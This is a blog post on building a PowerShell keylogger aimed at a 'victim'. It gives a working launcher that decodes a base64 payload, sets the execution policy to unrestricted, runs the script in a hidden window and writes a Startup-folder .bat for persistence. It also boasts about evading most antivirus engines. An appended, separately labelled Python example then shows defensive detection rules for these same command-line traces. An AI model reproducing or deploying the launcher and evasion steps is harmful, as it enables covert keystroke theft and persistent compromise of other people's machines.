
Make PowerShell Keyloggers Virus


PowerShell is a great tool for making all your virus needs. You can do almost anything in PowerShell, including making keyloggers. Though it is more practical to make them in VB or C#, here is a simple and effective piece of keylogger code:

 

 

All those random comments actually do something, which I will explain in a minute.

So if you run this in PowerShell it comes up as a PowerShell window, something obvious and suspicious. Also, you can convert it into a .exe file but anti-virus catches those pretty easily.

So I converted the script into base64 and ran a program that decrypts it and runs the code. The random comments add randomness to the base64 encryption. The program looks like this:

 

[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(“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”)) >C:\users\Public\logfile.ps1set-executionpolicy unrestrictedecho powershell.exe -noexit -windowstyle hidden C:\users\Public\logfile.ps1 >C:\Users\charl\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.batpowershell.exe -noexit -windowstyle hidden C:\users\Public\logfile.ps1

 

So if you convert this into a .exe file, currently only 13 of 66 anti-viruses detect it on VirusTotal, so if you load it onto a system with these anti-viruses it probably won’t work. I could probably do better encryption but it’s ok for a small project.

There are currently 13 anti-viruses that detect it as a virus, so if your victim doesn’t have one of those you’re good to go.
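
The launcher shown above does not depend on antivirus signatures to be caught: it leaves plain command-line traces (a hidden PowerShell window, a .ps1 under C:\users\Public, a .bat written into the Startup folder, the execution policy set to unrestricted, a base64 decode). The following is an added detection example, not code from the original post; the rule names, weights, threshold and sample events are assumptions, and the events are constructed.

```python
import re
from collections import defaultdict

# Behaviours of the launcher shown on this page; names and weights are assumptions.
RULES = {
    "hidden_window": (2, re.compile(r"-w[a-z]*\s+hidden\b", re.I)),
    "policy_unrestricted": (2, re.compile(r"set-executionpolicy\s+unrestricted", re.I)),
    "base64_decode": (1, re.compile(r"frombase64string", re.I)),
    "ps1_in_public": (2, re.compile(r"\\users\\public\\[^\\\s]+\.ps1\b", re.I)),
    "startup_write": (3, re.compile(r">\s*\S.*\\start menu\\programs\\startup\\", re.I)),
}
THRESHOLD = 5  # assumed alerting threshold


def match_rules(command_line):
    """Return the set of rule names that fire on one command line."""
    return {name for name, (_, rx) in RULES.items() if rx.search(command_line)}


def score_hosts(events):
    """Sum the weights of distinct rules seen per host across all its events.

    Returns {host: (score, sorted rule names)} for hosts at or above THRESHOLD,
    so one benign hit (a vendor script using a hidden window) stays quiet.
    """
    hits = defaultdict(set)
    for host, command_line in events:
        hits[host] |= match_rules(command_line)
    alerts = {}
    for host, names in hits.items():
        score = sum(RULES[n][0] for n in names)
        if score >= THRESHOLD:
            alerts[host] = (score, sorted(names))
    return alerts


# Constructed process-creation command lines (not real telemetry).
SAMPLE_EVENTS = [
    ("ws-01", r"powershell.exe -noexit -windowstyle hidden C:\users\Public\logfile.ps1"),
    ("ws-01", r'cmd.exe /c echo powershell.exe -noexit -windowstyle hidden C:\users\Public\logfile.ps1 >"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\run.bat"'),
    ("ws-02", r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1"),
    ("ws-03", r"powershell.exe -w hidden -File C:\Program Files\Vendor\updater.ps1"),
]

if __name__ == "__main__":
    for host, (score, names) in score_hosts(SAMPLE_EVENTS).items():
        print(host, score, names)
```

In practice the events would come from process-creation logging with command lines enabled; the same patterns can also be applied to PowerShell script block logs.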

Shakil Ahmed

I'm a Content writer. My topic is Tech, Story, SEO, Digital Marketing etc. I'm Work With MDOmarMakki.Org Website for CEO of This Website MD Omar Makki
